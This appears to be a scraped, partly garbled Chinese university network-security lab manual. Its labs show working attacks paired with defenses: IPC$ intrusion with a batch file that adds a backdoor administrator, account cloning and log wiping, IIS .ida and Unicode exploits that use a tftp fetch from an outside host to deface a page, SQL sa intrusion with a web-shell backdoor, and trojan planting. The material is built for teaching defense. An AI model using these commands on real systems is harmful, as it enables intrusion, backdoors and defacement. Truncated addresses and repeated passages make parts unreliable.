網絡安全實驗

1、實驗一 信息收集及掃描工具的使用 【實驗目的】 掌握利用注冊信息和基本命令實現信息搜集 掌握結構探測的基本方法 掌握 XSCAN 的使用方法 【實驗步驟】 一、 獲取 以及 的基本信息。 1、利用 ping 和 nslookup 獲取 IP 地址 2、利用 ron.ac/service/index.html 以及 來獲取信息 二、 使用 visualroute 或者下載 pingplotter 來獲取到達的結構信息。 三、 獲取局域網內主機 192.

2、168.4.100 的資源信息。 1、pinga 00 t 獲取主機名 2、netstat a 00 獲取所在域以及其他信息 3、net view 00 獲取共享資源 4、nbtstata 00 獲取所在域以及其他信息 四、使用X-SCAN 掃描局域網內主機00。 圖 1-1 X-SCAN 主界面 1、設置掃描地址范圍。圖 1-2 X-SCAN 掃描范圍設置 2、在掃描模塊中設置要掃描的項目。 圖 1-3 X-SCAN 掃描模塊設置 3、設置并發(fā)掃描參數。圖 1-4 X-SCAN 掃描

3、參數設置 4、在掃描中跳過沒有響應的主機。圖 1-5 X-SCAN 其他參數設置 5、設置要檢測的端口及檢測方式。 圖 1-6 X-SCAN 檢測方式設置 6、開設掃描，查看掃描報告。 【實驗報告】 1、寫出實驗內容一中要求所獲取的信息。 2、畫出從本地主機到達 的結構信息。實驗二 IPC$入侵的防護 【實驗目的】 掌握 IPC$連接的防護手段 了解利用 IPC$連接進行遠程文件操作的方法。 了解利用 IPC$連接入侵主機的方法。 【實驗步驟】 一、IPC$連接的建立與斷開。 通過 IPC$連接遠程目標主機的條件是已獲得目標主機管理員帳號和密碼。 1、單擊“開始”“運行

4、”，在“運行”對話框中輸入“cmd”。 圖 2-1 運行 CMD 2、建立 IPC$連接，鍵入命令 net use1ipc$ “qqqqqq” /user: “administrator”。 圖 2-2 建立 IPC$連接 3、映射網絡驅動器，使用命令：net use z:1c$。 4、映射成功后，打開“我的電腦” ，會發(fā)現多了一個Z盤，該磁盤即為目標主機的 C盤。圖 2-3 資源管理器 5、查找指定文件，用鼠標右鍵單擊 Z盤，選擇“搜索” ，查找關鍵字“賬目” ，結果如圖所 示。將該文件夾復制、粘貼到本地磁盤，其操作就像對本地磁盤進行操作一樣。

5、 6、斷開連接，鍵入”net use */del”命令斷開所有的 IPC$連接。 圖 2-4 斷開 IPC 連接 7、通過命令 net use目標 IPipc$del 可以刪除指定目標 IP 的 IPC$連接。 二、建立后門賬號 1、編寫 BAT 文件。打開記事本，鍵入“net user sysback /add”和“net localgroup administrators sysback/add”命令，編寫完后，另存為“hack.bat”。如圖所示。 圖 2-5 hack.bat 編輯2、與目標主機建立 IPC$連接。 3、 復制文件到目標主機。 打開 MSDOS， 鍵入“copy hac

6、k.bat 1d$”命令。 COPY 命令執(zhí)行成功后，就已經把 E盤下的 hack.bat 文件拷貝到 1 的D 盤內。 圖 2-6 hack.bat 復制 4、通過計劃任務使遠程主機執(zhí)行 hack.bat 文件，鍵入”net time 1”命令，查看目標系統(tǒng)時間。 圖 2-7 hack.bat 遠處執(zhí)行 5、如果目標系統(tǒng)的時間為 23：22，則可鍵入“at 1 23:30 d:hack.bat”命令， 計劃任務添加完畢后，使用命令“net use */del”斷開 IPC$連接。 6、驗證帳號是否

7、成功建立。等一段時間后，估計遠程主機已經執(zhí)行了 hack.bat 文件。通過 建立 IPC$連接來驗證是否成功建立“sysback”帳號。若連接成功，說明管理員帳號“sysback” 已經成功建立連接。 三、安全解決方案 1、在 PC（地址為 1）刪除默認共享，通過“net share”了解共享資源。 圖 2-8 共享資源 2、建立 BAT文件，文件名為 noshare.bat，內容如下： “net share ipc$ /del net share c$ /del net share d$/del”3、將其復制到本機“開始”“程序”“啟動”中。 4、禁止空連接，將該命

8、令“net stop server /y”加入 noshare.bat 文件中，或通過打開“控制 面板”“管理工具”“服務” ，在列表中找到 Server，使用鼠標右擊該服務，在彈 出菜單中選擇屬性，選擇“禁用” 。 圖 2-9 關閉 Server 服務 【實驗報告】 1、與遠程主機建立 IPC$需要滿足什么條件？ 2、建立了 IPC$連接能夠做哪些工作？實驗三 留后門與清腳印的防范 【實驗目的】 了解帳號后門以及防范手段 掌握手工克隆帳號原理 掌握日志清除的防范方法 【實驗需求】 計算機兩臺，要求安裝 Windows 2000 操作系統(tǒng) 交換機一臺、直連線兩根 權限提升工具 PSU.exe

9、【實驗步驟】 一、設置隱藏帳號 1、試運行權限提升工具 PSU.exe 測試結果如圖。 圖 3-1 PSU使用說明 2、進入任務管理器，查看 SYSTEM 的 PID 號 如圖 PID 為 8。圖 3-2 任務管理器 3、使用 PSU工具把它加載到注冊表中。 圖 3-3 PSU 工具把它加載到注冊表 4、在注冊表中找到存放系統(tǒng)帳號名稱以及配置信息的注冊項。圖 3-4 注冊表 5、找到 Administrator 查看他的類型如圖.它的類型為 0x1f4 圖 3-5 注冊表 6、由于采用 16 進制換算過來就是 F4 這個項， 所以我們知道 F4 這個項存放的 就是系統(tǒng)管理員的權限及配置信息。

10、圖 3-6 注冊表 7、打開里面的 F 項把里面的 16 進制數據復制出來。圖 3-7 注冊表編輯 8、使用剛才的方法找到 GUEST用戶打開相同的項把剛才復制的 16 進制數據粘貼進去。 圖 3-8 注冊表修改 9、為了隱蔽性我們把 GUEST 帳號禁用首先在命令行模式下鍵入”net user guest /active:no。 圖 3-9 GUEST 帳號禁用 10、 下面我們來看下當前Guest 帳號的狀態(tài)在命令行下輸入 “net user Guest”。 由圖 3-10 可以看出 Guest 用戶只屬于 Guest 組， 接下來打開計算機管理中的帳號中的帳號管理可以發(fā) 現 Guest

11、用戶已經被禁用了。圖 3-10 系統(tǒng)帳號查看 11、注銷后用Guest 帳號登陸發(fā)現桌面配置與 Administrator 用戶完全一樣，下面我們用這 個帳號執(zhí)行一個只有系統(tǒng)管理員才有權執(zhí)行的操作，如果成功那表示這個帳號后門可用。 圖 3-11 增加用戶 二、清除日志： 1、首先制作一個 DOS下的批處理文件用于刪除所有的日志，把它保存為.bat 文件。 圖 3-11 增加用戶 二、清除日志： 1、首先制作一個 DOS下的批處理文件用于刪除所有的日志，把它保存為.bat 文件。 置它的運行時間。圖 3-13 刪除日志文件運行 4、通過檢查被攻擊主機的日志信息，可以發(fā)現內容為空。 三、安全解決方

12、案 1、杜絕 Guest 帳戶的入侵。可以禁用或徹底刪除 Guest 帳戶，但在某些必須使用到 Guest 帳戶的情況下，就需要通過其它途徑來做好防御工作了。首先要給 Guest 設一個強壯的 密碼，然后詳細設置Guest 帳戶對物理路徑的訪問權限（注意磁盤必須是NTFS 分區(qū)）。 例如禁止 Guest 帳戶訪問系統(tǒng)文件夾。可以右擊“WINNT”文件夾，在彈出菜單中選擇 “安全”標簽，從中可看到可以訪問此文件夾的所有用戶。刪除管理員之外的所有用戶 即可. 圖 3-14 禁止 Guest帳戶訪問系統(tǒng)文件夾 2、日志文件的保護。首先找出日志文件默認位置，以管理員身份登錄進系統(tǒng)，并在該系統(tǒng) 的桌面中

13、依次單擊“開始”“運行”命令，在彈出的系統(tǒng)運行對話框中，輸入字符串 命令“compmgmt.msc” ，單擊“確定”按鈕后打開服務器系統(tǒng)的計算機管理窗口。圖 3-15 計算機管理窗口 3、其次在該管理窗口的左側顯示窗格中，用鼠標逐一展開“系統(tǒng)工具”“事件查看器” 分支項目，在“事件查看器”分支項目下面我們會看到“系統(tǒng)” 、 “安全性”以及“應用 程序”這三個選項。要查看系統(tǒng)日志文件的默認存放位置時，我們可以直接用鼠標右鍵 單擊“事件查看器”分支項目下面的“應用程序”選項，從隨后彈出的快捷菜單中執(zhí)行 “屬性”命令。在該窗口的常規(guī)標簽頁面中，我們可以看到本地日志文件的默認存放位 置為“C:WIND

14、OWSsystem32configAppEvent.Evt” 。 圖 3-16 屬性設置窗口 4、做好日志文件挪移準備，為了讓服務器的日志文件不被外人隨意訪問，我們必須讓日志 文件挪移到一個其他人根本無法找到的地方，例如可以到 E 分區(qū)的一個“E:aaa”目 錄下面創(chuàng)建一個“bbb”目錄 5、正式挪移日志文件，將對應的日志文件從原始位置直接拷貝到新目錄位置 “E:aaabbb”下 6、修改系統(tǒng)注冊表做好服務器系統(tǒng)與日志文件的關聯，依次單擊系統(tǒng)桌面中的“開始” “運行”命令，在彈出的系統(tǒng)運行對話框中，輸入注冊表編輯命令“regedit” ，單擊回車鍵后，打開系統(tǒng)的注冊表編輯窗口；用鼠標雙擊“HK

15、EY_LOCAL_MACHINE”注冊表子鍵， 在隨后展開的注冊表分支下面依次選擇“SYSTEM” 、 “CurrentControlSet” 、 “Services” 、 Eventlog”項目，在對應“Eventlog”項目下面我們會看到“System” 、 “Security” 、 “Application”這三個選項 圖 3-17 注冊表編輯窗口 7、在對應“System”注冊表項目的右側顯示區(qū)域中，用鼠標雙擊“File”鍵值，打開如圖 2 所示的數值設置對話框， 然后在“數值數據”文本框中，輸入“E:aaabbb SysEvent.Evt”字符串內容，也就是輸入系統(tǒng)日志文件新的路徑信

16、息，最后單擊“確定” 按鈕；同樣地，我們可以將“Security” 、 “Application”下面的“File”鍵值依次修 改為“E:aaabbb SecEvent.Evt” 、 “E:aaabbb AppEvent.Evt” ，最后按一下鍵盤 中的 F5 功能鍵刷新一下系統(tǒng)注冊表，就能使系統(tǒng)日志文件的關聯設置生效了。 圖 3-18 注冊表編輯窗【實驗報告】 1、帳號克隆是什么意思？留后門的作用是什么？ 2、請簡述本次試驗中遇到的問題和解決的方法。實驗四 基于 IIS服務器攻擊的防護 【實驗目的】 練習使用X-Scan V3.3 GUI掃描工具； 了解不同漏洞的入侵方式，并掌握各種漏洞解決

17、方案 【實驗內容】 練習基于*.ida 的入侵 練習基于.printer 漏洞的入侵 練習基于 Unicode漏洞的入侵 【實驗工具】 本地主機不限制操作系統(tǒng) 遠程主機操作系統(tǒng)：Windows 2000 或 Windows 2000 Sp1 或 Windows 2000 Sp2 工具 X-Scan V3.3 GUI、idahack.exe 或 ida.exeIDA 溢出工具、iisx.exe、 tftpd32.exe 【實驗步驟】 一、基于*.ida 漏洞的入侵 1、掃描遠程服務器，尋找有漏洞的主機。打開 X-scan，按照如圖 4-1 和圖 4-2 所示，填好 掃描項目， 開始掃描遠程主機。

18、 掃描完畢后， 在掃描報告中， 發(fā)現遠程服務器 01 存在 IIS .IDA ISAPI過濾器漏洞。圖 4-1 選擇掃描范圍 圖 4-2 選擇掃描模塊 在瀏覽器的地址欄中輸入 01/*.ida”,返回信息“文件 c:inetpubwwwroot*.ida。 文件名、目錄名或卷標語法不正確。 ”如圖 4-3 所示，確認遠 程主機存在漏洞，并得到遠程服務器提供 Web 服務的根目錄是 c:inetpubwwwroot。 2、IDA 溢出，將工具 IDAHack.exe 拷貝到%systemroot%/system32目錄下。通過“運行”

19、“cmd”打開命令提示符，在命令行下輸入“idahack 01 80 1 520”(說明： 目標主機沒有打補丁，因此主機類型是 1)，打開端口號 520（如圖 3.45），等待 Telnet 登 錄。圖 4-3 IDA溢出 注釋：如果使用 ida.exe 工具，則在命令行中輸入“ida 01 80 0”即可打開 telnet 端口號 99。 3、Telnet 登錄，在 MS-DOS 中鍵入“telnet 01 520”命令遠程登錄服務器 （如圖 4-4所示）。該 telnet 登錄并無身份驗證， 如果登錄成功，立即得到 S

20、HELL， 該 SHELL 擁有管理員權限，可以在其中執(zhí)行任何命令。 圖 4-4 輸入telnet命令 圖 4-5 成功入侵 4、建立帳號,如圖 4-5 入侵成功后，在遠程服務器上建立管理員帳號，如圖 4-6： 圖 4-6 在遠程主機上創(chuàng)建管理員帳號 此時，入侵者便獲得了一個遠程主機上的管理員帳號，可以通過系統(tǒng)認證來“合法”地 使用“計算機管理”或“DameWare”等工具遠程控制服務器，并且在遠程服務器上添加了后 門帳號。 5、使用“exit”命令退出登錄。 6、防護為 Windows 2000 操作系統(tǒng)打 SP4 補丁。Windows 2000 Service Pack 4 的下載地址是

21、/china/windows2000/downloads/SP4.mspx，下載頁面如圖 4-7 所示。 圖 4-7 Windows 2000 Service Pack 4下載頁面 （2）為該漏洞安裝補丁 Windows NT 4.0 的補丁下載網址： /Downloads/Release.asp?ReleaseID=30833 Windows 2000 Professional/Server/Advanced Server 的補丁下載網址： /Downlo

22、ads/Release.asp?ReleaseID=30800 Windows XP beta 在正式版本得到解決。 （3）刪除.ida&.idq的腳本映射 建議：即使已經為該漏洞安裝了補丁最好還是刪除.IDA 映射。 刪除方法：打開 Internet 服務管理器；右擊服務器并在菜單中選擇“屬性” ；選擇“主 屬性” ，選擇 WWW 服務 - 編輯 - 主目錄 - 配置，在擴展名列表中刪除.ida 和.idq 項。 二、基于.printer 漏洞的入侵 1、使用 X-Scan 工具掃描遠程服務器（略）。 2、使用 iisx.exe 工具連接有.printer漏洞的主機

23、01，如圖 4-8。 圖 4-8 使用 iisx 連接遠程主機 3、執(zhí)行 Telnet 命令：Telnet 01 7788，入侵遠程主機。 4、在遠程主機上創(chuàng)建管理員后門帳號（略）。 5、使用“exit”命令退出登錄。 6、防護 （1）為 Windows 2000 操作系統(tǒng)打 SP4 補丁。Windows 2000 Service Pack 4 的下載地址是 /china/windows2000/downloads/SP4.mspx（下載頁面見前面圖4-7 所示）。 （2）安裝漏洞補丁。 該漏洞補丁的下載地址是 http:/

24、/Downloads/Release.asp?ReleaseID=29321 三、 “涂鴉”主頁 1、準備標語。用網頁設計軟件，如 DreamWeaver、FrontPage 制作一個標語網頁，保存為 l.htm。 2、探知遠程服務器的 web 根目錄。首先查找被修改主頁文件保存在哪里。利用 Unicode 漏 洞找出 Web 根目錄所在。通過查找文件的方法找到遠程服務器的 Web 根目錄。在 IE 中輸入 “01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:mmc .g

25、if/s，其中“/s”參數加在 dir 命令后表示查找指定文件或文件夾的物理路徑，所以 “dir+c:mmcgif”表示在遠程服務器的 C盤中查找 mmc.gif 文件。由于文件 mmc.gif 是 IIS 默認安裝在 Web根目錄中,所以在找到該文件的同時， 也就找到了 Web 根目錄。 如圖 4-9。 圖 4-9 查找Web 服務器根目錄 3 、 涂鴉主頁 。 涂鴉主頁之前 ， 可以利用 Unicode 漏洞 ， 在地址欄中輸入 01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:inetp ubwww

26、root 來遍歷根目錄下的文件。通常主頁的文件名一般是 index.htm，index.html， default.asp，default.htm 等。由圖 4-10 可知，遠程主機的主頁是 index.htm。因此，此 時只需要將我們制作的標語文件 1.htm 上傳到遠程主機的 Web 根目錄下覆蓋掉 index.htm 就可以了。在本機運行 TFTP 服務器（tftpd32.exe）,此時不需要做任何設置，只要把 1.htm 文件拷貝到 TFTP 服務器的路徑下，通過 tftp 命令就能將 1.htm下載到遠程主機。 圖 4-10 Web根目錄注釋：Tftp工具的使用方式如下表所示： 工具

27、描述 Windows 自帶命令，專門用于從 tftp 服務器上下載和上傳文件。 命令格式 TFTP -i host GET|PUT sourse destination 參數說明 -i：二進制文件傳輸；host：TFTP 服務器地址；GET：下載文件；PUT：上傳文 件； Source：文件名；Destination：目的地 利用 Unicode 漏洞使用 TFTP 命令把本機上的 1.htm上傳到遠程主機的 Web 根目錄下， 使用命令“tftp++get+1.htm+c:inetpubwwwrootindex.htm” 覆蓋遠程主機 上的主頁文件。在瀏覽器的地址欄里

28、輸入： “01/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+192.1 68.26.12+get+1.htm+c:inetpubwwwrootindex.htm”之后，得到結果如圖 4-11所示，已 經完成上傳文件的任務。 圖 4-11 上傳覆蓋文件 4、 重新登錄遠程主機的網站。 刷新后， 即可看到剛才下載到目標主機的標語文件， 如圖 4-12 所示。 “涂鴉”主頁成功。 圖 4-12“涂鴉”后的主頁 5、防護 （1）為 Windows 2000 操作系統(tǒng)打 SP4 補丁。Windows 2000 Ser

29、vice Pack 4 的下載地址是 /china/windows2000/downloads/SP4.mspx。 （2）安裝漏洞補丁。該漏洞補丁的下載地址是 /kb/（也可 以使用文中所提供的該漏洞補丁的下載地址）。在該頁面中選擇與自己的操作系統(tǒng)相應的補 丁下載并安裝。例如如果所使用的操作系統(tǒng)是簡體中文版，且 IIS 的版本是 5.0，則選擇該 頁面中的“Chinese (Simplified) Language Version”下載并安裝即可。如圖4-13所示。圖 4-13 下載漏洞補丁 （

30、3）臨時解決方法。如果不需要可執(zhí)行的 CGI，可以刪除可執(zhí)行虛擬目錄，例如 /scripts 等。如果確實需要可執(zhí)行的虛擬目錄，建議可執(zhí)行虛擬目錄單獨在一個分區(qū)。 【實驗報告】 1、請簡述 IIS 漏洞有哪些？ 2、簡述網頁涂鴉的方法。實驗五 基于 SQL Server服務器攻擊的防護【實驗目的】 通過對 MSSQL的入侵，了解入侵者的入侵方式 掌握 MSSQL的入侵的防護措施 【實驗環(huán)境】 本地主機不限制操作系統(tǒng) 遠程主機操作系統(tǒng)：Windows 2000 + SQLServer 2000 工具 MS SQL 客戶端或者是第三方軟件，本實驗采用第三方軟件 SqlExec.exe（命 令行）

31、X-Scan V3.3 GUI或 SQLServerSniffer.exe 后門 SqlRootkit.asp tftpd32.exe 【實驗步驟】 一、利用 MSSQL空口令入侵 在 Windows 2000 中，企業(yè)級用戶一般均使用微軟的數據庫管理軟件 MS SQL Server， 在安裝 MS SQL Server 后，將產生默認的 SA用戶，且初始密碼在管理員未設置的情況下為 空，但 SA為 SQL Server 中非常重要的安全模塊成員，因此入侵者即可通過 SQL Server 客 戶端或其他工具進行數據庫遠程連接，從而在 MS SQL Server 服務器上新建管理員級別的 Adm

32、inistrators 組用戶。具體步驟如下： 1、利用 X-Scan V3.3 GUI 或者 SQLServerSniffer.exe 進行掃描，找出 sa 空口令主機 01。 2、將命令行工具 SqlExec.exe 拷貝到本地主機%systemroot%system32 目錄下。在 MS-DOS 中鍵入命令： sqlexec 01， 當出現如圖3.56所示畫面， 表示入侵成功， 并有了system 權限，可以創(chuàng)建用戶、更改用戶密碼等。 圖5-1利用空口令入侵成功 3、創(chuàng)建遠程主機的用戶帳號：net user SQLhack /add，帳號創(chuàng)

33、建完成后，會自動斷開與遠程主機的連接。 4、通過 sqlexec工具重新入侵遠程主機，將所建用戶SQLhack加入到 administrators 組中， 使用戶具有較高的管理權限：net localgroup administrators SQLhack /add。入侵者成功入侵了 遠程主機，并在遠程主機上擁有了管理員組的用戶，可以通過該帳號利用“計算機管理” 、 建立 IPC$管道連接等方式進一步控制目標服務器。 5、防守 MSSQL空口令入侵 （1）為 SA用戶設置密碼； （2）為 Windows 2000 安裝 Service Pack 3 或 Service Pack 4。 二、利用

34、 SQL后門攻擊 MSSQL服務器 對于安裝網絡防火墻的遠程服務器，即使入侵者掌握了 SQL 服務器的 SA 密碼也不容 易連接到該計算機中的 SQL服務器。而且網絡防火墻對 SQL端口特別敏感，總是濾掉發(fā)往 1433 端口的連接請求。但在實際中，入侵者能夠制作一種 SQL后門。只要把該后門文件放 入遠程服務器的Web根目錄下， 入侵者就可以通過IE瀏覽器在遠程服務器中執(zhí)行任何命令。 此外，由于網絡防火墻不會濾掉發(fā)往 Web 服務器的連接請求，因此該后門對于那些同時提 供 Web 服務的遠程服務器尤其適用?，F在攻擊運行著 SQL和 Web 服務器的 01 為例： 1、

35、利用 X-Scan工具對遠程服務器進行弱口令掃描， 如圖 3-50 所示， 遠程主機 01 的 SA密碼是 123。 2、用記事本打開 SqlRootkit.asp，將 SqlRootkit.asp 中 SQL 管理員帳號和密碼修改成“sa” 和“123” 。 3、利用 WebDAV漏洞，將 SqlRootkit.asp傳至遠程服務器 web 根目錄下。 （1）查找 Web 根目錄，得知是“c:inetpubwwwroot” ； （2）運行 tftpd32.exe，并將 SqlRootkit.asp拷貝到 tftpd32.exe目錄下； （3）利用 WebDAV漏洞上傳

36、 SqlRootkit.asp到 c:inetpubwwwroot 目錄中，使用的命 令為“tftp+2+get+SqlRootkit.asp+c:inetpubwwwroot” ，其中 2 是 tftp服務器。 4、通過 IE 瀏覽實現遠程控制。 打開 IE，在瀏覽器中輸入：01SqlRootkit.asp 來訪問遠程服務器，得 到命令輸入界面。在該界面可以通過 net 命令實現遠程控制。并且能夠通過 net user 命令建 立帳號，并把所建帳號添加到管理員組，使遠程服務器提供帳號后門。 5、防護 可以通過

37、消除 WebDAV漏洞來防止該攻擊的發(fā)生。Windows 2000 操作系統(tǒng)的 4 個版本，以 及打了SP1、 SP2、 SP3補丁Windows 2000 操作系統(tǒng)都存在WebDAV漏洞。 然而Windows 2000 SP4 就已經彌補了該漏洞。因此，安裝了 Windows 2000 操作系統(tǒng)之后， 及時為系統(tǒng)打上 SP4 補丁可以有效地組織上述攻擊的發(fā)生。Windows 2000 Service Pack 4 的下載地址是 /china/windows2000/down loads/SP4.mspx 所示。 【實驗報告】 1、SP4 指什么意

38、思，它的作用是什么？2、簡述本次試驗中遇到的問題和解決的方法。實驗六 宏病毒及網頁病毒的防范 【實驗目的】 了解宏病毒、網頁病毒的運行環(huán)境、運行平臺和傳播手段； 掌握 Word 宏病毒的防范； 掌握使用 ASP 腳本網頁病毒的防范； 【實驗原理】 宏病毒是利用了一些數據處理系統(tǒng)內置宏編程指令的特性而形成的一種特殊病毒。 它和 其它一般的病毒不同， 它是依附在正常的Word 文件上，利用 Word 文檔可執(zhí)行其內部宏命令 代碼的方式，在Word 文檔打開或關閉時來控制并感染系統(tǒng)。中了宏病毒，輕則文件被破壞， 重則格式化硬盤，使數據毀于一旦。 對于網頁病毒的制作，可以使用 ASP 腳本開發(fā)語言。微

39、軟推出的該腳本語言，可以將 VBScript 代碼添加到HTML 頁面中，從而方便在編寫Web 應用程序時實現系統(tǒng)功能的應用。 然而這也為一些目的不良的人提供了方便， 使得制作網頁病毒十分簡單， 網頁病毒大量泛濫。 【實驗步驟】 一、宏病毒的制作 1、首先啟動 Word2000 或者 Word2003，在窗口菜單欄中選擇“插入”“對象” ，在彈出的 圖 6-1 所示的窗口中選擇“對象類型”列表的“包”選項，然后點擊“確定” 。 圖 6-1 插入包對象 2、完成后將彈出圖 6-2 所示的“對象包裝程序”對話框窗口，再點擊窗口中的“編輯”“命 令行” 菜單項， 在彈出的 “命令行” 對話框窗口中輸

40、入 “C:Windowssystem32telnet.exe” ， 完成后點擊“確定” 。圖 6-2 對象包裝程序 3、然后在“對象包裝程序”窗口中點擊“插入圖標”按鈕，為該命令行選一個有誘惑力的 圖標，然后關閉“對象包裝程序”窗口，此時就在文檔相關位置出現了一個和相關命令關聯 的圖標，如圖 6-3 所示。也可以在圖標旁邊加點鼓動性的文字，盡量讓瀏覽者看到后想用鼠 標點擊，這樣一個簡單的宏病毒就做成功了。 圖 6-3 一個簡單的宏病毒 4、宏病毒的清除，使用殺毒軟件檢查 Word 安裝目錄下的 Startup 目錄文件和 Normal.dot 文件。 5、只打開Word 而不是雙擊文檔，選擇“

41、工具”菜單下的“宏”選項，在“安全性”選項中 將“安全級”設為“高” 。圖 6-4 宏病毒的防范 二、網頁病毒的制作 1、代碼編輯 首先，我們使用寫字板中編輯如下代碼： 其中，之間的是寫入的 VBScript腳本。腳本通過 Dim 語句聲明了一個對象變量， 而后使用 Set fso=Server.CreateObject(Scripting.FilesystemObject)產生一個服務器 系統(tǒng)對象。使用 fso.CreateTextFile(d:myfile)在 d 盤根目錄建立一個文件 myfile， 并且使用 response.write(新建文件 myfile)在頁面中說明建立的完成。

42、 2、執(zhí)行腳本編寫的代碼。要執(zhí)行上述代碼，首先要配好 IIS 服務和 Web服務器。 3、當 Web 服務器配置完成，將上述編輯好的代碼保存到 Web 服務器的路徑中，例如 “C:Inetpubwwwroottest.asp” 。 4、打開 IE 瀏覽器，在地址欄中輸入“ http:/localhost/test.asp” ，運行腳本。這時， 如果腳本沒有語法錯誤則將在網頁中輸出“新建文件myfile” ，并且在d 盤根目錄下建立了 一個文件 myfile，如圖 6-5 所示。 圖 6-5 網頁病毒 5、網頁病毒的防范，使用“regsvr32 scrrun.dll /u”命令禁用文件系統(tǒng)對象

43、“FileSystemObject” 。 6、自定義安全級別，打開 IE 瀏覽器，在“Internet 選項”“安全”選項中選擇“自定 義安全級別” ，把“ActiveX 控件及插件”的一切設為禁用。圖 6-6 網頁病毒的防范 【實驗報告】 1、針對網頁病毒的基本制作過程。寫出如何通過類似的方式來控制注冊表、查詢系統(tǒng)信息、 將其它類型的病毒、木馬加入我們的網頁中。實驗七 第四代木馬的防御 【實驗目的】 了解第四代木馬的特點； 了解反彈技術及連接方式； 掌握第四代木馬廣外男生的防范技術； 【實驗設備】 操作系統(tǒng)平臺：Win2000 或 WinXp。 木馬工具：廣外男生。 【實驗原理】 廣外男生同

44、廣外女生一樣，是廣東外語外貿大學的作品，是一個專業(yè)級的遠程控制及網 絡監(jiān)控工具。廣外男生除了具有一般普通木馬應該具有的特點以外，還具備以下特色： 客戶端模仿 Windows資源管理器：除了全面支持訪問遠程服務器端的文件系統(tǒng)，也同時 支持通過對方的“網上鄰居”訪問對方內部網其他機器的共享資源。 強大的文件操作功能：可以對遠程機器進行建立文件夾，整個文件夾的一次刪除，支持 多選的上傳、下載等基本功能。同時支持對遠程文件的高速查找，并且可以對查找的結果進 行下載和刪除操作。 運用了“反彈端口”與“線程插入”技術：使用了目前流行的反彈端口的木馬技術，可 以在互聯網上訪問到局域網里通過 NAT代理上網的

45、電腦，輕松穿越防火墻。 “線程插入” 技術是指在服務器端運行時沒有進程， 所有網絡操作均插入到其它應用程 序的進程中完成。因此，服務器端的防火墻無法進行有效的警告和攔截。 “反彈端口”技術是指，連接的建立不再由客戶端主動要求連接，而是由服務器端來完 成，這種連接過程正好與傳統(tǒng)連接方式相反。當遠程主機被種植了木馬之后，木馬服務器在 遠程主機上線之后主動尋找客戶端建立連接， 客戶端的開放端口在服務器的連接請求后進行 連接、通信。 【實驗步驟】 一、廣外男生的基本使用 1、客戶端設置：打開廣外男生客戶端（gwboy092.exe），選擇“設置”“客戶端設置” ， 打開“廣外男生客戶端設置程序” ，如

46、圖 7-1 所示。其中最大連接數一般使用默認的 30 臺， 客戶端使用端口一般設置成 80。圖 7-2 廣外男生客戶端連接類型設置 3、點擊“下一步” ，再點擊“完成”按鈕結束客戶端的設置。 4、服務端設置：進行服務端設置時，選擇“設置”“服務器設置” ，打開“廣外男生服 務端生成向導” ，如圖 7-3 所示。 圖 7-3 廣外男生服務器端設置 5、選擇“同意”之后，點擊下一步，開始進行服務端常規(guī)設置，如圖 7-4 所示。其中，EXE 文件名是安裝木馬后生成的程序名稱，DLL 文件名是安裝木馬后生成的 DLL 文件的名稱圖 7-4 廣外男生服務器端常規(guī)設置 6、設置完成后點擊“下一步” ，進行

47、“網絡設置” 。根據實際網絡環(huán)境，選擇靜態(tài)IP 選項進 行實際網絡的設置，如圖 7-5所示。 圖 7-5 廣外男生服務器端網絡設置 7、設置完成點擊“下一步” ，填寫生成服務器端的目標文件的名稱，然后點擊“完成” ，結 束服務器端的配置，如圖 7-6所示。 圖 7-6 廣外男生服務器端的目標文件 8、種植木馬：將生成的目標文件發(fā)送到遠程主機，然后在遠程主機運行。9、重新啟動遠程主機，在客戶端進行觀察等待遠程主機的連接，并對遠程主機的運行進行 監(jiān)控。如圖 7-7所示，服務器與客戶端連接成功；圖 7-8 展示的是客戶端看到的遠程主機的 文件系統(tǒng)；圖 7-9 展示的是通過客戶端看到的遠程主機的注冊表

48、。 圖 7-7 遠程主機連接成功 圖 7-8 文件共享 圖 7-9 遠程注冊表二、廣外男生木馬的清除 1、檢測廣外男生木馬的有效方法為使用“netstat -na”查看目標主機的網絡連接情況，如 果端口 8225開放，那么該主機可能已經中了廣外男生木馬。 2、打開注冊表編輯器，展開到“HKEY_LOCAL_MACHINE”“SOFTWARE”“Microsoft”“Windows” “CurrentVersion”“Run”下，刪除字符串指 gwboy.exe。然后到“HKEY_LOCAL_MACHINE” “SOFTWARE”“Classes”“CLSIDT” ，刪除 ID 為5EAE4AC

49、0-146E-11D2-A96E-9 的鍵及其下所有子鍵和鍵值。 3、點擊 “編輯”菜單中的 “查找” ，在注冊表編輯器中搜索 gwVboydl1。dll，找到所有 和它有關的注冊表項，全部刪除。 5、刪除 system32 目錄下的 gwboy.exe 。 然后進入 DOS 模式下 ， 輸入 del winntsystem32gwVboydll.dll 命令，刪除 system32 目錄中的 gwboydll.dll 文件。 【實驗報告】 1、簡述第一代到第四代木馬的顯著特征。 2、簡述木馬的功能和防護方法。實驗八 Sniffer Pro的抓包與發(fā)包 【實驗目的】 掌握 Sniffer pr

50、o的安裝與基本界面的使用 利用工具欄進行網絡監(jiān)控 使用 Sniffer pro進行數據的捕獲 了解報文發(fā)送功能 【實驗設備】 集線器或采用端口鏡像的交換機、路由器 服務器、計算機兩臺或多臺 網線 【實驗步驟】 一、Sniffer pro安裝，與其他任何Microsoft Windows 上的應用程序一樣簡單，對于計算 機系統(tǒng)的要求極低，采用標準的 Installshield Wizard 來指導安裝。 1、雙擊 Setup.exe啟動安裝，會看到 Installshield Wizard 屏幕，單擊 Next 按鈕繼續(xù)。 圖 8-1 Sniffer pro 安裝向導 2、安裝程序會找出安裝所需

51、文件，下面出現歡迎屏幕，單擊Next 按鈕繼續(xù)下一步。圖 8-2 Sniffer pro 安裝向導 3、仔細閱讀軟件安裝協議，如果同意，點擊Yes 按鈕繼續(xù)，然后輸入用戶信息。 圖 8-4 Sniffer pro 安裝向導 4、指定安裝位置，點擊 Next 繼續(xù)。圖 8-5 Sniffer pro 安裝向導 5、安裝程序開始復制文件，結束后 Sniffer pro 會要求用戶注冊，包括用戶姓名（Name）、 單位（Business）、用戶類型（Customer Type）和電子郵件（E-mail），輸入完畢后點擊 Next 繼續(xù)。 圖 8-6 Sniffer pro 安裝向導 6、接著輸入你的

